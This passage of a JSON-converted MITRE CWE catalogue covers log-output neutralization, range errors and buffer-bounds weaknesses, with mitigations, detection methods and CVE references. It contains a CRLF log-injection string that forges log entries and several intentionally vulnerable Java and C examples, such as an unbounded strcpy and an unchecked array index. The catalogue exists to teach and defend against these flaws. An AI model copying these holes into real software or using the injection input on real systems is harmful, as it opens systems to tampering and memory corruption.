manually on an as-needed basis or automated with a tool that automatically culls logs for important events or trending information."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Non-Repudiation"],"Impact":["Modify Application Data","Hide Activities","Execute Unauthorized Code or Commands"],"Note":"Interpretation of the log files may be hindered or misdirected if an attacker can supply data to the application that is subsequently logged verbatim. In the most benign case, an attacker may be able to insert false entries into the log file by providing the application with input that includes appropriate characters. Forged or otherwise corrupted log files can be used to cover an attacker\'s tracks, possibly by skewing statistics, or even to implicate another party in the commission of a malicious act. If the log file is processed automatically, the attacker can render the file unusable by corrupting the format of the file or injecting unexpected characters. An attacker may inject code or other commands into the log file and take advantage of a vulnerability in the log processing utility."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following web application code attempts to read an integer value from a request object. If the parseInt call fails, then the input is logged with an error message indicating what happened.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String val = request.getParameter(\\"val\\");try {}catch (NumberFormatException) {}...","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value = Integer.parseInt(val);","xhtml:br":""}},{"#text":"log.info(\\"Failed to parse val = \\" + val);","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":["If a user submits the string \\"twenty-one\\" for val, the following entry is logged:",{"xhtml:ul":{"xhtml:li":{"xhtml:div":"INFO: Failed to parse val=twenty-one"}}},"However, if an attacker submits the string \\"twenty-one%0a%0aINFO:+User+logged+out%3dbadguy\\", the following entry is logged:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"INFO: Failed to parse val=twenty-one"},{"xhtml:div":"INFO: User logged out=badguy"}]}},"Clearly, attackers can use this same mechanism to insert arbitrary log entries."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-4624","Description":"Chain: inject fake log entries with fake timestamps using CRLF injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4624"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Log Forging"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS03-J","Entry_Name":"Do not log unsanitized user input","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS03-J","Entry_Name":"Do not log unsanitized user input","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"268"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"93"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-52"}},{"attr":{"@_External_Reference_ID":"REF-53"}},{"attr":{"@_External_Reference_ID":"REF-43"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Common_Consequences, Description, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Log Forging","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Output Sanitization for Logs","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Output Sanitization for Logs","attr":{"@_Date":"2010-06-21"}}]}},"118":{"attr":{"@_ID":"118","@_Name":"Incorrect Access of Indexable Resource (\'Range Error\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not restrict or incorrectly restricts operations within the boundaries of a resource that is accessed using an index or pointer, such as memory or files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Time_of_Introduction"}],"Previous_Entry_Name":[{"#text":"Range Errors","attr":{"@_Date":"2008-09-09"}},{"#text":"Improper Access of Indexable Resource (aka \'Range Error\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Access of Indexable Resource (\'Range Error\')","attr":{"@_Date":"2017-05-03"}}]}},"119":{"attr":{"@_ID":"119","@_Name":"Improper Restriction of Operations within the Bounds of a Memory Buffer","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer.","Extended_Description":{"xhtml:p":["Certain languages allow direct addressing of memory locations and do not automatically ensure that these locations are valid for the memory buffer that is being referenced. This can cause read or write operations to be performed on memory locations that may be associated with other variables, data structures, or internal program data.","As a result, an attacker may be able to execute arbitrary code, alter the intended control flow, read sensitive information, or cause the system to crash."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"118","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Buffer Overflow","Description":"The \\"buffer overflow\\" term has many different meanings to different audiences.  From a CWE mapping perspective, this term should be avoided where possible. Some researchers, developers, and tools intend for it to mean \\"write past the end of a buffer,\\" whereas other use the same term to mean \\"any read or write outside the boundaries of a buffer, whether before the beginning of the buffer or after the end of the buffer.\\"  Still others using the same term could mean \\"any action after the end of a buffer, whether it is a read or write.\\" Since the term is commonly used for exploitation and for vulnerabilities, it further confuses things."},{"Term":"buffer overrun","Description":"Some prominent vendors and researchers use the term \\"buffer overrun,\\" but most people use \\"buffer overflow.\\" See the alternate term for \\"buffer overflow\\" for context."},{"Term":"memory safety","Description":"\\"Memory safety\\" is generally used for techniques that avoid weaknesses related to memory access, such as those identified by CWE-119 and its descendants. However, the term is not formal, and there is likely disagreement between practitioners as to which weaknesses are implicitly covered by the \\"memory safety\\" term."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory"],"Note":"If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow. If the attacker can overwrite a pointer\'s worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator."},{"Scope":["Availability","Confidentiality"],"Impact":["Read Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":"Confidentiality","Impact":"Read Memory","Note":"In the case of an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode Quality Analysis","Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Source Code Quality Analyzer"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.","Be wary that a language\'s interface to native code may still be subject to overflows, even if the language itself is theoretically safe."]}},{"attr":{"@_Mitigation_ID":"MIT-4.1"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions."]},"Effectiveness_Notes":"This is not a complete solution, since many buffer overflows are not related to strings."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-9"},"Phase":"Implementation","Description":{"xhtml:p":"Consider adhering to the following rules when allocating and managing an application\'s memory:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Double check that the buffer is as large as specified.","When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.","Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.","If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions."]}}}},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-13"},"Phase":"Implementation","Description":"Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.","Effectiveness":"Moderate","Effectiveness_Notes":"This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE &lt;= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i &lt; strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&amp;\' == user_supplied_string[i] ){}else if (\'&lt;\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&amp;\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &amp;lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."},{"attr":{"@_Demonstrative_Example_ID":"DX-90"},"Intro_Text":"The following example asks a user for an offset into an array to select an item.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main (int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *items[] = {\\"boat\\", \\"car\\", \\"truck\\", \\"train\\"};int index = GetUntrustedOffset();printf(\\"You selected %s\\\\n\\", items[index-1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126)."},{"attr":{"@_Demonstrative_Example_ID":"DX-100"},"Intro_Text":"In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getValueFromArray(int *array, int len, int index) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value;if (index &lt; len) {}else {}return value;","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// check that the array index is less than the maximum","// length of the array","// if array index is invalid then output error message","// and return value indicating error"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"value = array[index];","xhtml:br":["",""],"xhtml:i":"// get the value at the specified index of the array"}},{"#text":"printf(\\"Value is: %d\\\\n\\", array[index]);value = -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if (index &gt;= 0 &amp;&amp; index &lt; len) {...","xhtml:br":["","","","","","","",""],"xhtml:i":["// check that the array index is within the correct","// range of values for the array"]}}],"Body_Text":"However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below."},{"Intro_Text":"Windows provides the _mbs family of functions to perform various operations on multibyte strings. When these functions are passed a malformed multibyte string, such as a string containing a valid leading byte followed by a single null byte, they can read or write past the end of the string buffer causing a buffer overflow. The following functions all pose a risk of buffer overflow: _mbsinc _mbsdec _mbsncat _mbsncpy _mbsnextc _mbsnset _mbsrev _mbsset _mbsstr _mbstok _mbccpy _mbslen"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2550","Description":"Classic stack-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2550"},{"Reference":"CVE-2009-2403","Description":"Heap-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2403"},{"Reference":"CVE-2009-0689","Description":"large precision value in a format string triggers overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689"},{"Reference":"CVE-2009-0690","Description":"negative offset value leads to out-of-bounds read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0690"},{"Reference":"CVE-2009-1532","Description":"malformed inputs cause accesses of uninitialized or previously-deleted objects, leading to memory corruption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1532"},{"Reference":"CVE-2009-1528","Description":"chain: lack of synchronization leads to memory corruption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1528"},{"Reference":"CVE-2021-29529","Description":"Chain: machine-learning product can have a heap-based\\n\\t      buffer overflow (CWE-122) when some integer-oriented bounds are\\n\\t      calculated by using ceiling() and floor() on floating point values\\n\\t      (CWE-1339)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29529"},{"Reference":"CVE-2009-0558","Description":"attacker-controlled array index leads to code 